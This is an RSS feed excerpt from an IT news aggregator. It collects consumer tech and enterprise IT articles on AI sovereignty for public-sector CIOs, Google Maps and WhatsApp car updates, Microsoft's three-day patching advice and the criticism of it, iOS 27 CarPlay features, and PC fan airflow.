<p class="wp-block-paragraph">Public trust is the constraint sovereignty rhetoric tends to skip. The OECD’s <a href="https://www.oecd.org/en/publications/governing-with-artificial-intelligence_795de142-en.html">2025 review of government AI</a> warns that opaque systems make AI-assisted decisions hard to explain and can give public servants false confidence in tools that fail quietly. State-controlled AI is the same problem from the other side: A government that deploys models against its own citizens without audit or record has gained control and lost accountability. An agency that can log, explain and reverse an AI-assisted action can defend it to citizens, courts, auditors and elected officials. If it cannot, it has bought access and called it sovereignty.</p>



<p class="wp-block-paragraph">None of this is new. AI sovereignty repeats earlier fights over cloud, telecom, semiconductors and cybersecurity. Europe’s flagship cloud project, GAIA-X, became a cautionary tale; the Dutch technologist Bert Hubert called it an <a href="https://berthub.eu/articles/posts/gaia-x-is-an-expensive-distraction/">“expensive distraction”</a> that produced no European cloud, the familiar result of ambition without absorptive capacity. Cloud taught governments that outsourcing infrastructure does not outsource accountability; telecom, that vendor dependency becomes strategic exposure; chips, that supply chains matter before a crisis; cybersecurity, that trust must be verified continuously. AI inherits all four at once.</p>



<p class="wp-block-paragraph">Over the next five to ten years, some countries will build national platforms, more will build trusted cloud and trusted model regimes, and most will run hybrids that pair domestic data control with global model access. Trade policy will harden those choices: Export controls on compute and data-localization rules will pull the vendor market into blocs that track alliances more than open markets. For a CIO, that turns a vendor and hosting decision into a five-year bet on whose rules and supply chains will still hold. The ones that succeed will treat sovereignty as an operating requirement, backed by leverage, not a slogan. Start with the control plane before the model: Most agencies will never own the model, and the controls are what decide whether the AI they do run stays accountable. Even when procurement policy is dictated from above, these questions remain within the CIO’s authority:</p>



<ol start="1" class="wp-block-list">
<li>Can we classify AI workloads by public-service risk?</li>



<li>Can we prove where sensitive data goes across training, retrieval, inference, logging and retention?</li>



<li>Can we restrict which models are approved for which data classes and functions?</li>



<li>Can we reconstruct an AI-assisted action in enough detail to explain it?</li>



<li>Can we change providers without losing continuity or institutional knowledge?</li>



<li>Can we explain the system to citizens, regulators, auditors and elected officials?</li>
</ol>



<p class="wp-block-paragraph">A “no” to any of these does not mean the agency lacks AI. It means the agency has access it does not yet control. Public institutions can use global innovation without surrendering public authority, but only once they know what to hold, what to rent and where dependency turns into risk.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Maps bekommt jetzt das beeindruckendste Update seit Jahren]]></title>
<description><![CDATA[Es ist soweit, Google hat damit begonnen, das wohl größte Google-Maps-Update seit vielen Jahren an die ersten Nutzer auszuliefern, wie Androidpolice berichtet. Damit ändert sich die Kartenansicht, aber auch die Bedienung der Navigations-App entscheidend.



Vereinfacht gesagt: Google Maps präsent...]]></description>
<link>https://tsecurity.de/de/3688387/it-nachrichten/google-maps-bekommt-jetzt-das-beeindruckendste-update-seit-jahren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688387/it-nachrichten/google-maps-bekommt-jetzt-das-beeindruckendste-update-seit-jahren/</guid>
<pubDate>Thu, 23 Jul 2026 10:33:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Es ist soweit, Google hat damit begonnen, <a href="https://www.pcwelt.de/article/3087745/das-groesste-google-maps-update-seit-jahren-so-profitieren-viele-davon-aber-nicht-alle.html" target="_blank" rel="noreferrer noopener">das wohl größte Google-Maps-Update seit vielen Jahren </a>an die ersten Nutzer auszuliefern, wie Androidpolice <a href="https://www.androidpolice.com/huge-google-maps-upgrade-rolling-out-on-android-auto/">berichtet</a>. Damit ändert sich die Kartenansicht, aber auch die Bedienung der Navigations-App entscheidend.</p>



<p>Vereinfacht gesagt: Google Maps präsentiert sich nun immersiver, um das beliebte Modewort zu verwenden, und mit viel 3D. Man schaut jetzt nicht mehr <strong>auf </strong>die Karten, sondern <strong>in </strong>die Karten beziehungsweise in die Häuserschluchten hinein. Das soll diese sogenannte „Immersive Navigation“ das Wiedererkennen von Gebäuden oder Brücken, unter denen Sie in der App erkennbar durchfahren, und von Landschaftsmerkmalen vor Ort erleichtern, damit Sie sich leichter orientieren können.</p>



<p>Speziell die 3D-Ansicht der Karten während der Navigation sieht durchaus beeindruckend aus. Ob sich damit tatsächlich die Navigation erleichtert oder das Ganze den Fahrer vielleicht sogar eher ablenkt, wie <a href="https://www.googlewatchblog.de/2026/07/google-maps-navigation-riesiges-update-bringt-voellig-neues-immersive-design-und-funktionen-galerie/">einige </a>kritisieren, muss jeder selbst entscheiden. In jedem Fall wirken die Gebäude und das Gelände realistischer. Einzelne Fahrspuren, aber auch Ampeln oder Stoppschilder sind gut zu erkennen. In diesem Zusammenhang sollen Fahrer mit einem verbesserten Zoom auch besser vorausschauen können.</p>



<p>Google will zudem die Sprachanweisungen verbessert haben. Sie sollen jetzt natürlicher klingen, wie Anweisungen von einem Beifahrer: „Fahren Sie an dieser Ausfahrt vorbei und nehmen Sie die nächste Ausfahrt für XY.“ Zu angebotenen Alternativrouten liefert Google Maps zudem Detailinformationen, die bei der Entscheidungsfindung helfen sollen. Beispielsweise ob auf der Alternativroute weniger Verkehr ist, die Strecke dafür aber länger.</p>



<p>Befinden Sie sich dann kurz vor dem Ziel, dann zeigt Google Maps eine Streetview-Vorschau, damit Sie Ihr Ziel sofort in der Realität erkennen. Falls Sie als Ziel eine Hausnummer angegeben haben, sollte Google Maps den dazugehörigen Hauseingang anzeigen. Mit etwas Glück bekommen Sie sogar eine Parkempfehlung.</p>



<h2 class="wp-block-heading">Wer bekommt jetzt das neue Google Maps?</h2>



<p>Grundsätzlich will Google das neue Google Maps für alle unterstützten Plattformen und für alle Länder ausliefern. Dafür schaltet Google die “Immersive Navigation” serverseitig frei. Los geht es jetzt aber auf Android und iOS sowie auf Android Auto und Apple Carplay nur in den USA. Wann „Immersive Navigation“ nach Deutschland kommt, ist noch unbekannt.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Whatsapp im Auto deutlich besser: Großes Update für Android Auto und Carplay startet]]></title>
<description><![CDATA[Whatsapp erweitert die Nutzung des Messengers auf mehreren Plattformen. Mit einem neuen Funktionspaket verbessert das Unternehmen vor allem die Integration in Android Auto und Apple CarPlay. Nutzer können Nachrichten künftig komfortabler über das Fahrzeug steuern, Anrufe verwalten und auf wichtig...]]></description>
<link>https://tsecurity.de/de/3688358/it-nachrichten/whatsapp-im-auto-deutlich-besser-grosses-update-fuer-android-auto-und-carplay-startet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688358/it-nachrichten/whatsapp-im-auto-deutlich-besser-grosses-update-fuer-android-auto-und-carplay-startet/</guid>
<pubDate>Thu, 23 Jul 2026 10:25:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Whatsapp erweitert die Nutzung des Messengers auf mehreren Plattformen. Mit einem neuen Funktionspaket verbessert das Unternehmen vor allem die Integration in <a href="https://www.pcwelt.de/article/1161010/android-auto-im-test-funktionen-apps-auto-hersteller-varianten.html" target="_blank" rel="noreferrer noopener">Android Auto</a> und Apple CarPlay. Nutzer können Nachrichten künftig komfortabler über das Fahrzeug steuern, Anrufe verwalten und auf wichtige Kontakte zugreifen.</p>



<p>Whatsapp hat die neuen Funktionen <a href="https://blog.whatsapp.com/new-feature-roundup-sign-up-on-ipad-whatsapp-in-your-car-and-more" target="_blank" rel="noreferrer noopener">in einem offiziellen Blogeintrag vorgestellt</a>. Die Neuerungen werden ab sofort schrittweise eingeführt und betreffen neben der Nutzung im Auto auch PDF-Dateien in Whatsapp Web und Desktop, den Status sowie die iPad-App. </p>



<h2 class="wp-block-heading">Whatsapp im Auto: Neue Oberfläche für Android Auto und CarPlay</h2>



<p>Die größte Änderung richtet sich an Autofahrer. Whatsapp hat die Benutzeroberfläche für Android Auto und Apple Carplay vollständig überarbeitet. Ziel ist es, die Nutzung während der Fahrt einfacher zu gestalten und die wichtigsten Funktionen direkt über das Fahrzeug verfügbar zu machen.</p>



<p>Über den Bildschirm des Autos lassen sich künftig unter anderem:</p>



<ul class="wp-block-list">
<li>Nachrichten anhören und per Sprache beantworten</li>



<li>Whatsapp-Anrufe starten und annehmen</li>



<li>Die eigene Anrufliste einsehen</li>



<li>Bevorzugte Kontakte über einen Schnellzugriff erreichen</li>
</ul>



<p>Die Bedienung erfolgt freihändig über die Sprachsteuerung oder die vorhandenen Bedienelemente des Fahrzeugs. Nutzer müssen dafür nicht zum Smartphone greifen.</p>



<h2 class="wp-block-heading">PDFs direkt in Whatsapp öffnen und bearbeiten</h2>



<p>Auch Whatsapp Web und die Desktop-Version erhalten neue Möglichkeiten. PDF-Dateien können Nutzer künftig direkt im Chat öffnen, ohne dass sie sie zunächst herunterladen müssen.</p>



<p>Über eine Integration von Adobe Acrobat lassen sich außerdem einfache Bearbeitungen vornehmen. Dazu gehören etwa das Hervorheben von Textstellen oder das Hinzufügen von Anmerkungen direkt im Dokument.</p>



<p>Gerade beim schnellen Prüfen oder Kommentieren von Dateien kann das den Umgang mit Dokumenten vereinfachen.</p>



<h2 class="wp-block-heading">Musik aus Apple Music und Spotify im Whatsapp-Status teilen</h2>



<p>Eine weitere Neuerung betrifft den Whatsapp-Status. Nutzer können Songs aus Apple Music und Spotify künftig direkt über die jeweiligen Apps in ihrem Status teilen. Mit wenigen Schritten lässt sich so der aktuell gehörte Titel mit Kontakten teilen. </p>



<h2 class="wp-block-heading">Whatsapp auf dem iPad kann jetzt direkt eingerichtet werden</h2>



<p>Auch bei der iPad-Nutzung gibt es eine wichtige Änderung. Bisher musste ein iPad mit einem bereits eingerichteten Whatsapp-Konto auf einem Smartphone verknüpft werden.</p>



<p>Diese Einschränkung entfällt nun: Nutzer können ein Whatsapp-Konto direkt in der iPad-App erstellen und einrichten. Für die Registrierung wird weiterhin eine gültige Telefonnummer benötigt, da Whatsapp einen Bestätigungscode per SMS verschickt.</p>



<p>Nach der Einrichtung lässt sich Whatsapp auf dem iPad unabhängig vom Smartphone verwenden.</p>



<h2 class="wp-block-heading">Neue Funktionen werden schrittweise verteilt</h2>



<p>Whatsapp führt die neuen Funktionen ab sofort ein. Wie bei größeren Updates üblich, erfolgt die Verteilung schrittweise, sodass nicht jeder Nutzer die Neuerungen gleichzeitig erhält.</p>



<p>Wer die neuen Funktionen nutzen möchte, sollte sicherstellen, dass die Whatsapp-App auf dem aktuellen Stand ist.</p>



<p><strong>Weitere News zum Thema:</strong></p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3195616/google-maps-in-android-auto-bekommt-ein-tachometer.html" target="_blank" rel="noreferrer noopener">Google Maps in Android Auto bekommt ein Tachometer</a></li>



<li><a href="https://www.pcwelt.de/article/1203090/android-auto-einfach-und-guenstig-nachruesten-so-geht-s.html" target="_blank" rel="noreferrer noopener">Android Auto einfach und günstig nachrüsten: So geht’s</a></li>



<li><a href="https://www.pcwelt.de/article/3193424/whatsapp-nutzernamen-lassen-sich-jetzt-verwenden-revolution-beim-datenschutz.html" target="_blank" rel="noreferrer noopener">Whatsapp schaltet Nutzernamen jetzt scharf</a></li>



<li><a href="https://www.pcwelt.de/article/3165436/whatsapp-web-gruppenanrufe-voice-video-calls-beta.html" target="_blank" rel="noreferrer noopener">Whatsapp bringt Gruppenanrufe ins Web – neue Funktion startet im Browser</a></li>
</ul>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Maps in Android Auto bekommt ein Tachometer]]></title>
<description><![CDATA[Falls Sie dem Tacho Ihres Fahrzeugs nicht vertrauen oder aus irgendeinem Grund eine zweite Anzeige brauchen, steht Ihnen bald eine neue Möglichkeit zur Verfügung, Ihre Fahrgeschwindigkeit im Blick zu behalten. 9to5Google berichtet nämlich, dass die Android-Auto-Version der Karten-App Google Maps ...]]></description>
<link>https://tsecurity.de/de/3688357/it-nachrichten/google-maps-in-android-auto-bekommt-ein-tachometer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688357/it-nachrichten/google-maps-in-android-auto-bekommt-ein-tachometer/</guid>
<pubDate>Thu, 23 Jul 2026 10:25:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Falls Sie dem Tacho Ihres Fahrzeugs nicht vertrauen oder aus irgendeinem Grund eine zweite Anzeige brauchen, steht Ihnen bald eine neue Möglichkeit zur Verfügung, Ihre Fahrgeschwindigkeit im Blick zu behalten. <a href="https://9to5google.com/2026/07/19/android-auto-finally-starts-rolling-out-a-speedometer-in-google-maps/" target="_blank" rel="noreferrer noopener">9to5Google berichtet</a> nämlich, dass die <a href="https://www.pcwelt.de/article/1161010/android-auto-im-test-funktionen-apps-auto-hersteller-varianten.html" target="_blank" rel="noreferrer noopener">Android-Auto</a>-Version der Karten-App Google Maps nun offenbar endlich mit einem Tacho ausgestattet wurde.</p>


<div class="wp-block-embed-reddit">
					<blockquote class="reddit-card">
						<a href="https://www.reddit.com/r/AndroidAuto/comments/1uzlb2l/google_maps_beta_speedometer_in_android_auto/"></a>
					</blockquote>
				</div>


<p>Der neue Geschwindigkeitsmesser scheint jedoch noch nicht flächendeckend eingeführt zu sein. Nutzer des Online-Forums <a href="https://www.reddit.com/r/AndroidAuto/comments/1uzlb2l/google_maps_beta_speedometer_in_android_auto/" target="_blank" rel="noreferrer noopener">Reddit berichten</a>, dass sie den neuen Geschwindigkeitsmesser in der Beta-Version 26.29.02.946673643 von Google Maps auf Android Auto entdeckt haben. Der Tacho wird in einem kleinen Feld in einer Ecke der Karte angezeigt und zeigt sowohl Ihre aktuelle Geschwindigkeit als auch die Geschwindigkeitsbegrenzung auf der Straße an, auf der Sie fahren.</p>



<p>Die Apple CarPlay-Version von Google Maps erhielt bereits vor zwei Jahren Unterstützung für den Geschwindigkeitsmesser; es ist unklar, warum Google so lange damit gewartet hat, diese Funktion in seiner eigenen Auto-App einzuführen. Mit dem nächsten regulären Update für Google Maps wird sie vermutlich für alle Nutzer erhältlich sein.</p>



<p>Übrigens hat Google kürzlich auch die Kartenansicht und Navigation in Google Maps umfassend überarbeitet. <a href="https://www.pcwelt.de/article/3190416/google-maps-bekommt-jetzt-das-beeindruckendste-update-seit-jahren-immersive-3d-navigation.html" target="_blank" rel="noreferrer noopener">Es ist das vermutlich beeindruckendste Update seit Jahren, wie Sie hier nachlesen können.</a></p>



<p>Außerdem gab es ein großes Update für Whatsapp in Android Auto und Carplay: <a href="https://www.pcwelt.de/article/3197588/whatsapp-update-android-auto-carplay-neue-funktionen.html" target="_blank" rel="noreferrer noopener">Whatsapp im Auto deutlich besser: Großes Update für Android Auto und Carplay startet</a>.</p>



<p><strong>Mehr zum Thema:</strong></p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/1161010/android-auto-im-test-funktionen-apps-auto-hersteller-varianten.html" target="_blank" rel="noreferrer noopener">Android Auto im Test: Funktionen, Apps, Auto-Hersteller, Varianten</a></li>



<li><a href="https://www.pcwelt.de/article/1203090/android-auto-einfach-und-guenstig-nachruesten-so-geht-s.html" target="_blank" rel="noreferrer noopener">Android Auto einfach und günstig nachrüsten: So geht’s</a></li>



<li><a href="https://www.pcwelt.de/article/2861341/google-maps-optimal-nutzen-tipps.html" target="_blank" rel="noreferrer noopener">15 clevere Tipps für Google Maps, die Sie kennen sollten</a></li>
</ul>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft’s 3-day patching directive comes with added operational risk]]></title>
<description><![CDATA[Microsoft 365 Director Jeremy Chapman this month took to video to tell Windows admins that the days of delaying security patches are over.



Complex enterprise systems and historic incidents involving patch problems have caused many admins to hold fire on immediately applying security patches, i...]]></description>
<link>https://tsecurity.de/de/3688232/it-security-nachrichten/microsofts-3-day-patching-directive-comes-with-added-operational-risk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688232/it-security-nachrichten/microsofts-3-day-patching-directive-comes-with-added-operational-risk/</guid>
<pubDate>Thu, 23 Jul 2026 09:10:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Microsoft 365 Director Jeremy Chapman this month <a href="https://www.youtube.com/watch?v=QdjSkbKXoJw">took to video to tell Windows admins</a> that the days of delaying security patches are over.</p>



<p class="wp-block-paragraph">Complex enterprise systems and historic incidents involving patch problems have caused many admins to hold fire on immediately applying security patches, in many cases deferring patch rollouts for two to four weeks or more to ensure stability. Microsoft argues that this cautious approach, though understandable, is no longer viable because AI is accelerating the discovery and exploitation of software vulnerabilities.</p>



<p class="wp-block-paragraph">As a result, Microsoft has advised admins to act on patches within three days.</p>



<p class="wp-block-paragraph">Independent experts agree with Microsoft’s diagnosis of the <a href="https://www.csoonline.com/article/4196435/flaw-surge-fuels-need-for-cisos-to-rethink-vulnerability-management.html">problems posed by AI-powered vulnerability discovery</a>, but many say Microsoft’s three-day remediation window is unrealistic for large enterprises with heavy testing, change-control, and compatibility constraints.</p>



<p class="wp-block-paragraph">Instead of taking a blanket approach, enterprises need to focus more on quickly resolving those vulnerabilities that are under active exploitation and relevant to their environments, according to critics of Microsoft’s revised approach.</p>



<h2 class="wp-block-heading">Tighter patching deadlines</h2>



<p class="wp-block-paragraph">Microsoft’s <a href="https://techcommunity.microsoft.com/blog/microsoftmechanicsblog/deploy-windows-updates-to-counter-ai-discovered-threats/4534505">revised vulnerability remediation advice</a> comes in the wake of its work with <a href="https://www.csoonline.com/article/4155342/what-anthropic-glasswing-reveals-about-the-future-of-vulnerability-discovery.html">Anthropic’s Project Glasswing</a> and findings from Microsoft’s own MDASH multi-model agentic scanning harness. Tighter patching deadlines are configurable via Windows Autopatch and Microsoft Intune or update tooling options such as Microsoft Configuration Manager and Windows Server Update Services.</p>



<p class="wp-block-paragraph">As IT environments become increasingly more complex, inadvertent issues can occur with what appears to be a simple patch.</p>



<p class="wp-block-paragraph">Unique or complex deployments may not be compatible with a patch, resulting in potential data corruption, system shutdown, or the dreaded “Blue Screen of Death.” Multiple vendors in the operating system and the enterprise software and security market have released patches that have broken products and caused outages, so the issue goes well beyond Windows shops.</p>



<p class="wp-block-paragraph">Increasing both the volume and the speed of patching is unsustainable for most security teams because organizations are <a href="https://www.csoonline.com/article/3520881/patch-management-a-dull-it-pain-that-wont-go-away.html">already struggling with successful remediation</a> as it is.</p>



<p class="wp-block-paragraph">“Many organizations have patch windows, review cycles, and test environments to identify these issues prior to patching production environments,” says Scott Caveza, senior research manager at exposure management and vulnerability assessment firm Tenable. “Organizations lacking the resources for extended validation risk deploying faulty patches that cause downtime or force last-minute configuration changes.”</p>



<p class="wp-block-paragraph">Caveza adds: “The mitigation steps will vary for each organization, but blindly relying on auto-updates without contextual validation is not a defensible security posture.”</p>



<p class="wp-block-paragraph">CISA’s Known Exploited Vulnerabilities list and other industry data suggest that only a small fraction of disclosed vulnerabilities are confirmed as exploited in the wild.</p>



<p class="wp-block-paragraph">“[Enterprises should focus on] identifying vulnerabilities with credible and functional PoCs, verified exploitation, or sustained attention from ransomware groups, threat actors, and botnets,” says Caitlin Condon, vice president of security research at VulnCheck. “Timely exploit intelligence helps organizations identify the bugs that require immediate attention, while allowing lower-risk issues to proceed through appropriate testing and change control.”</p>



<p class="wp-block-paragraph">Other independent experts are more sympathetic to Microsoft’s argument that AI has made vulnerability discovery and exploit development faster than ever and, as a result, the risks of delaying patches are far greater.</p>



<p class="wp-block-paragraph">“Organizations sometimes delay patches to protect the uptime of critical systems, and many updates still require a restart,” says Danny Jenkins, CEO and co-founder at endpoint protection technology vendor ThreatLocker. “Some teams also stay one update cycle behind because they are concerned that a new patch could introduce bugs or break an overlooked dependency. Unfortunately, delaying patches to preserve uptime is becoming much harder to justify.”<br><br>Jenkins adds: “Organizations should not leave critical systems exposed while waiting for the next maintenance window. Patches should still be tested, but that process needs to move quickly, with the highest priority given to vulnerabilities that are actively exploited or exposed to the internet. A controlled interruption is usually far less costly than a successful attack exploiting a known vulnerability.”</p>



<h2 class="wp-block-heading">Wider cross-industry impact</h2>



<p class="wp-block-paragraph">Microsoft’s three-day recommendation reflects a fundamental change in the threat landscape. Other vendors might be expected to follow suit and that means CISOs need to revise their approach to vulnerability remediation.</p>



<p class="wp-block-paragraph">“Organizations should expect faster disclosure-to-exploitation timelines to become the norm, which means security programs must emphasize automation, trusted software supply chains, and continuous visibility rather than relying on periodic maintenance windows,” says Mike Nelson, VP and field CTO at DigiCert.</p>



<p class="wp-block-paragraph">AI is compressing the time between vulnerability discovery and exploitation, and the industry is moving rapidly from 30-, 60-, and 90-day patching windows toward a matter of days.</p>



<p class="wp-block-paragraph">However a “blanket three-day requirement for every vulnerability is neither realistic nor safe for most large organizations,” says Jeff Williams, founder and CTO at Contrast Security.</p>



<p class="wp-block-paragraph">Failing to patch opens up security threats, but rushing an inadequately tested patch into production creates operational risk.</p>



<p class="wp-block-paragraph">“The goal cannot be to treat every CVE [vulnerability] as an emergency,” according to Williams. “It has to be identifying, within hours, which vulnerabilities are actually exploitable and require immediate action.”</p>



<h2 class="wp-block-heading">Holistic remediation</h2>



<p class="wp-block-paragraph">Security teams are already facing significant pressure to patch faster and to remediate a rising tide of new vulnerabilities, yet many practitioners are losing ground. <a href="https://www.csoonline.com/article/4176086/vulnerabilities-have-become-cyber-attackers-no-1-door-to-the-enterprise.html">Verizon’s Data Breach Investigation Report</a>, published earlier this year, found that the median time to patch had actually increased to 43 days.</p>



<p class="wp-block-paragraph">Patch deployment in enterprise environments involves configuration changes, reviews, testing, and validation.</p>



<p class="wp-block-paragraph">Enterprises need to become more proficient at exposure management so that they have a holistic view of their environment that’s necessary to identify which assets are at greatest risk.</p>



<p class="wp-block-paragraph">“By pinpointing the misconfigurations, identity flaws, and specific vulnerabilities that pose the greatest risk to their environment, security teams can prioritize exactly what to patch first,” Tenable’s Caveza says. “The idea of ‘patch everything’ is really outdated, and ‘patch faster’ isn’t feasible with the rapidly increasing number of vulnerabilities disclosed each day.”</p>



<p class="wp-block-paragraph">CISOs will have to re-engineer their vulnerability and exposure management processes. “The traditional model of scanning everything, assigning generic severity scores, and tilting at a massive and expanding backlog is no longer fast enough,” says Contrast Security’s Williams.</p>



<p class="wp-block-paragraph">Organizations need to identify the small number of vulnerabilities that matter, protect against them immediately, and remediate them on a timeline the business can safely support.</p>



<p class="wp-block-paragraph">Enterprises should prioritize on resolving “internet facing, remotely exploitable vulnerabilities and any of the CISA Known Exploited Vulnerability list,” says Jose Lejin, an IEEE senior member.</p>



<p class="wp-block-paragraph">Businesses that cannot safely validate and deploy patches within three days still have options, including “compensating controls, reducing an asset’s exposure, or in some cases removing the component entirely, all of which shrink the exploitable risk and buy time to patch properly,” says Brad Hibbert, CSO of vulnerability management provider Brinqa.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[iOS 27 CarPlay: Every New Feature Coming This Fall]]></title>
<description><![CDATA[Apple is bringing several useful upgrades to CarPlay with iOS 27, making the in-car experience smarter, more interactive, and easier to use. While this is not the biggest CarPlay update ever released, it introduces meaningful improvements across Siri, media playback, video apps, and the overall i...]]></description>
<link>https://tsecurity.de/de/3688187/ios-mac-os/ios-27-carplay-every-new-feature-coming-this-fall/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688187/ios-mac-os/ios-27-carplay-every-new-feature-coming-this-fall/</guid>
<pubDate>Thu, 23 Jul 2026 08:57:19 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple is bringing several useful upgrades to CarPlay with iOS 27, making the in-car experience smarter, more interactive, and easier to use. While this is not the biggest CarPlay update ever released, it introduces meaningful improvements across Siri, media playback, video apps, and the overall interface.



The biggest highlight is Siri AI, which finally gives CarPlay a more capable voice assistant. Alongside that, Apple has expanded video support, refreshed the design, and added quality-of-life improvements for media controls. Most of these features will arrive when iOS 27 launches publicly this fall, although some will depend on whether automakers enable support in their vehicles.



FeatureWhat's NewAvailabilitySiri AISmarter conversations, context memory, synced historyAll supported CarPlay usersVideo AppsNative video browsing and playback appsSupported vehicles onlyNew WallpapersFresh wallpapers matching iOS 27 designAll usersLiquid Glass IconsUpdated app icons across CarPlayAll usersMiniPlayerAlbum artwork and playback controlsSupported media appsAudio ScrubbingDrag through songs and podcastsSupported media apps



Siri AI Makes CarPlay Much Smarter







The biggest improvement in iOS 27 is the arrival of Siri AI inside CarPlay. Apple has redesigned Siri with a cleaner interface that appears as a glowing orb at the bottom of the screen. The design is simpler than previous Apple Intelligence versions while remaining easy to recognize during driving.



More importantly, Siri now understands natural conversations much better. Instead of responding to one question at a time, it remembers the context of your conversation, allowing follow-up questions without repeating the original request. This makes navigation, messaging, and general information requests feel much more natural.



Siri AI also answers broader knowledge questions in a way that feels similar to modern AI assistants. Whether you ask about travel plans, nearby places, or general information, the responses are more detailed and conversational than before.



Siri Conversation History Sync



Apple has also introduced conversation syncing between CarPlay and the new Siri app on iPhone.



After using Siri in your car, you can open the Siri app on your iPhone and review previous conversations. Requests made through CarPlay are clearly marked with a small car icon, making it easy to continue a conversation after leaving your vehicle.



Native Video Apps Come to CarPlay







Apple first introduced video playback in cars through AirPlay, but iOS 27 expands the experience much further.



Developers can now build dedicated CarPlay video apps that allow users to browse their content directly from the vehicle's display instead of relying entirely on the iPhone interface.



This means supported streaming services can provide a complete CarPlay experience while the vehicle is parked.



Important limitations




Videos only play while the vehicle is stationary.



Playback stops when driving begins and switches to audio if supported.



Vehicle manufacturers must enable this feature.



Older vehicles may never receive support. citeturn0search1turn0search4




Refreshed CarPlay Design



Apple has updated the visual appearance of CarPlay to match the rest of iOS 27.



Users receive a new collection of wallpapers inspired by the latest system design. The updated backgrounds closely match the look found across iOS 27 and macOS Golden Gate.



CarPlay app icons also adopt Apple's latest Liquid Glass styling, creating a more modern appearance while keeping familiar layouts intact.



Better Media Playback Controls



Media playback receives several practical improvements that users have requested for years.



New MiniPlayer



Media applications now display a MiniPlayer in the upper-right corner of the interface.



Instead of showing a simple waveform icon, the MiniPlayer includes:




Album artwork



Play and pause controls



Quick access to currently playing content




This allows users to keep playback controls visible while browsing music or podcasts.



Audio Scrubbing Finally Arrives



One of the most welcome additions is audio scrubbing.



Users can now drag the playback progress bar directly from the Now Playing screen to move forward or backward through songs, podcasts, and supported audio content. Apple has also enlarged the progress indicator, making it easier to use on a vehicle's touchscreen.



This small feature significantly improves everyday usability, especially for podcasts and long playlists.



Compatibility



The new CarPlay features require:



RequirementStatusiPhone running iOS 27RequiredCompatible CarPlay vehicleRequiredNative video appsRequires automaker supportSiri AIAvailable on supported iPhones with iOS 27



Wrap Up



CarPlay in iOS 27 focuses on practical improvements instead of introducing an entirely new interface. Siri AI is the standout addition thanks to its stronger conversational abilities and conversation history syncing, while native video apps open new possibilities for entertainment when parked.



Meanwhile, smaller upgrades such as the MiniPlayer, audio scrubbing, refreshed wallpapers, and updated icons make the overall experience feel more polished. Although some features depend on automaker support, iOS 27 delivers one of the most useful CarPlay updates Apple has released in recent years.]]></content:encoded>
</item>
<item>
<title><![CDATA[So verbessern Sie Ihre CPU-Kühlung durch die richtige Lüfter-Konfiguration]]></title>
<description><![CDATA[Viele PC-Systeme kämpfen mit unnötig hohen CPU-Temperaturen, obwohl eigentlich ausreichend Gehäuselüfter eingebaut sind. Häufig liegt die Ursache nicht an zu schwacher Kühlung, sondern an einer ungünstigen Luftführung (Airflow). Besonders verbreitet ist der Ansatz, alle oberen Lüfter konsequent a...]]></description>
<link>https://tsecurity.de/de/3688151/windows-tipps/so-verbessern-sie-ihre-cpu-kuehlung-durch-die-richtige-luefter-konfiguration/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688151/windows-tipps/so-verbessern-sie-ihre-cpu-kuehlung-durch-die-richtige-luefter-konfiguration/</guid>
<pubDate>Thu, 23 Jul 2026 08:19:19 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Viele PC-Systeme kämpfen mit unnötig hohen CPU-Temperaturen, obwohl eigentlich ausreichend Gehäuselüfter eingebaut sind. Häufig liegt die Ursache nicht an zu schwacher Kühlung, sondern an einer ungünstigen Luftführung (Airflow). Besonders verbreitet ist der Ansatz, alle oberen Lüfter konsequent als Abluft zu konfigurieren. </p>



<p>Was logisch klingt, kann in klassischen PC-Gehäusen mit Luftkühler allerdings genau das Gegenteil bewirken. Mit einer kleinen Anpassung der Lüfterausrichtung lässt sich der Prozessor oftmals messbar kühler betreiben, und das ganz ohne zusätzliche Kosten. Der Kern des Problems liegt dabei im Zusammenspiel von Front- und Top-Lüftern.</p>



